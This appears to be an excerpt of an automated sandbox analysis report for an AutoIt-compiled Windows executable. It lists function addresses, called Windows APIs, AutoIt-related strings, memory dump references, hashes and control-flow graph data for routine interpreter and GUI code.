                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                            • String ID: 0SH
                                                            • API String ID: 3363477735-851180471
                                                            • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                            • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                            • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                            • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                            Function 0040EBD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                            • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: IsThemeActive$uxtheme.dll
                                                            • API String ID: 2574300362-3542929980
                                                            • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                            • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                            • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                            • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                            Function 004091E0 Relevance: 44.6, APIs: 22, Strings: 3, Instructions: 837windowsleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                            • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                            • TranslateMessage.USER32(?), ref: 00409556
                                                            • DispatchMessageW.USER32(?), ref: 00409561
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Message$Peek$DispatchSleepTranslate
                                                            • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                            • API String ID: 1762048999-758534266
                                                            • Opcode ID: 23d079a985ba2b1b40b9133d067a4c416b55a71ed9da253c2d941bd9d0d29544
                                                            • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                            • Opcode Fuzzy Hash: 23d079a985ba2b1b40b9133d067a4c416b55a71ed9da253c2d941bd9d0d29544
                                                            • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A
                                                            Function 00401F20 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 214COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • __wcsicoll.LIBCMT ref: 00402007
                                                            • __wcsicoll.LIBCMT ref: 0040201D
                                                            • __wcsicoll.LIBCMT ref: 00402033
                                                              • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                            • __wcsicoll.LIBCMT ref: 00402049
                                                            • _wcscpy.LIBCMT ref: 0040207C
                                                            • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104), ref: 00428B5B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                            • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$CMDLINE$CMDLINERAW
                                                            • API String ID: 3948761352-1609664196
                                                            • Opcode ID: de7630e39462d0d30620e5d386b824db2ab2692deedf796b652438eb031e1025
                                                            • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                            • Opcode Fuzzy Hash: de7630e39462d0d30620e5d386b824db2ab2692deedf796b652438eb031e1025
                                                            • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99
                                                            Function 0040E360 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                            • __wsplitpath.LIBCMT ref: 0040E41C
                                                              • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                            • _wcsncat.LIBCMT ref: 0040E433
                                                            • __wmakepath.LIBCMT ref: 0040E44F
                                                              • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                              • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                            • _wcscpy.LIBCMT ref: 0040E487
                                                              • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                            • _wcscat.LIBCMT ref: 00427541
                                                            • _wcslen.LIBCMT ref: 00427551
                                                            • _wcslen.LIBCMT ref: 00427562
                                                            • _wcscat.LIBCMT ref: 0042757C
                                                            • _wcsncpy.LIBCMT ref: 004275BC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                            • String ID: Include$\
                                                            • API String ID: 3173733714-3429789819
                                                            • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                            • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                            • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                            • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E
                                                            Function 004528BD Relevance: 19.7, APIs: 13, Instructions: 173COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • _fseek.LIBCMT ref: 0045292B
                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                              • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                              • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                            • __fread_nolock.LIBCMT ref: 00452961
                                                            • __fread_nolock.LIBCMT ref: 00452971
                                                            • __fread_nolock.LIBCMT ref: 0045298A
                                                            • __fread_nolock.LIBCMT ref: 004529A5
                                                            • _fseek.LIBCMT ref: 004529BF
                                                            • _malloc.LIBCMT ref: 004529CA
                                                            • _malloc.LIBCMT ref: 004529D6
                                                            • __fread_nolock.LIBCMT ref: 004529E7
                                                            • _free.LIBCMT ref: 00452A17
                                                            • _free.LIBCMT ref: 00452A20
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                            • String ID:
                                                            • API String ID: 1255752989-0
                                                            • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                            • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                            • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                            • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59
                                                            Function 00452719 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 147COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: __fread_nolock$_fseek_wcscpy
                                                            • String ID: FILE
                                                            • API String ID: 3888824918-3121273764
                                                            • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                            • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                            • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                            • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5
                                                            Function 00410490 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 56windowregistryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                            • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                            • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                            • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                            • ImageList_ReplaceIcon.COMCTL32(00991E18,000000FF,00000000), ref: 00410552
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                            • API String ID: 2914291525-1005189915
                                                            • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                            • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                            • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                            • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99
                                                            Function 00410390 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 76windowregistryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                            • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                            • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                            • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                            • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                            • RegisterClassExW.USER32(?), ref: 0041045D
                                                              • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                              • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                              • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                              • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                              • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                              • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                              • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00991E18,000000FF,00000000), ref: 00410552
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                            • String ID: #$0$AutoIt v3
                                                            • API String ID: 423443420-4155596026
                                                            • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                            • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                            • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                            • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                            Function 0040A780 Relevance: 16.6, APIs: 8, Strings: 1, Instructions: 881COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _malloc
                                                            • String ID: Default
                                                            • API String ID: 1579825452-753088835
                                                            • Opcode ID: 8d6a693bc28ede282e6a55fdab6cf0c37e3d7becfc9ec4ad637a350fdd6cb948
                                                            • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                            • Opcode Fuzzy Hash: 8d6a693bc28ede282e6a55fdab6cf0c37e3d7becfc9ec4ad637a350fdd6cb948
                                                            • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B
                                                            Function 0040F5C0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 125COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1954 40f5c0-40f5cf call 422240 1957 40f5d0-40f5e8 1954->1957 1957->1957 1958 40f5ea-40f613 call 413650 call 410e60 1957->1958 1963 40f614-40f633 call 414d04 1958->1963 1966 40f691 1963->1966 1967 40f635-40f63c 1963->1967 1968 40f696-40f69c 1966->1968 1969 40f660-40f674 call 4150d1 1967->1969 1970 40f63e 1967->1970 1974 40f679-40f67c 1969->1974 1971 40f640 1970->1971 1973 40f642-40f650 1971->1973 1975 40f652-40f655 1973->1975 1976 40f67e-40f68c 1973->1976 1974->1963 1979 40f65b-40f65e 1975->1979 1980 425d1e-425d3e call 4150d1 call 414d04 1975->1980 1977 40f68e-40f68f 1976->1977 1978 40f69f-40f6ad 1976->1978 1977->1975 1981 40f6b4-40f6c2 1978->1981 1982 40f6af-40f6b2 1978->1982 1979->1969 1979->1971 1990 425d43-425d5f call 414d30 1980->1990 1985 425d16 1981->1985 1986 40f6c8-40f6d6 1981->1986 1982->1975 1985->1980 1988 425d05-425d0b 1986->1988 1989 40f6dc-40f6df 1986->1989 1988->1973 1991 425d11 1988->1991 1989->1975 1990->1968 1991->1985
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: __fread_nolock_fseek_memmove_strcat
                                                            • String ID: AU3!$EA06
                                                            • API String ID: 1268643489-2658333250
                                                            • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                            • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                            • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                            • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754
                                                            Function 00401100 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136windowtimeregistryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1994 401100-401111 1995 401113-401119 1994->1995 1996 401179-401180 1994->1996 1998 401144-40114a 1995->1998 1999 40111b-40111e 1995->1999 1996->1995 1997 401182 1996->1997 2000 40112c-401141 DefWindowProcW 1997->2000 2002 401184-40118e call 401250 1998->2002 2003 40114c-40114f 1998->2003 1999->1998 2001 401120-401126 1999->2001 2001->2000 2005 42b038-42b03f 2001->2005 2009 401193-40119a 2002->2009 2006 401151-401157 2003->2006 2007 40119d 2003->2007 2005->2000 2008 42b045-42b059 call 401000 call 40e0c0 2005->2008 2012 401219-40121f 2006->2012 2013 40115d 2006->2013 2010 4011a3-4011a9 2007->2010 2011 42afb4-42afc5 call 40f190 2007->2011 2008->2000 2010->2001 2016 4011af 2010->2016 2011->2009 2012->2001 2019 401225-42b06d call 468b0e 2012->2019 2017 401163-401166 2013->2017 2018 42b01d-42b024 2013->2018 2016->2001 2023 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2016->2023 2024 4011db-401202 SetTimer RegisterWindowMessageW 2016->2024 2026 42afe9-42b018 call 40f190 call 401a50 2017->2026 2027 40116c-401172 2017->2027 2018->2000 2025 42b02a-42b033 call 4370f4 2018->2025 2019->2009 2024->2009 2033 401204-401216 CreatePopupMenu 2024->2033 2025->2000 2026->2000 2027->2001 2028 401174-42afde call 45fd57 2027->2028 2028->2000 2045 42afe4 2028->2045 2045->2009
                                                            APIs
                                                            • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                            • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                            • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                            • CreatePopupMenu.USER32 ref: 00401204
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
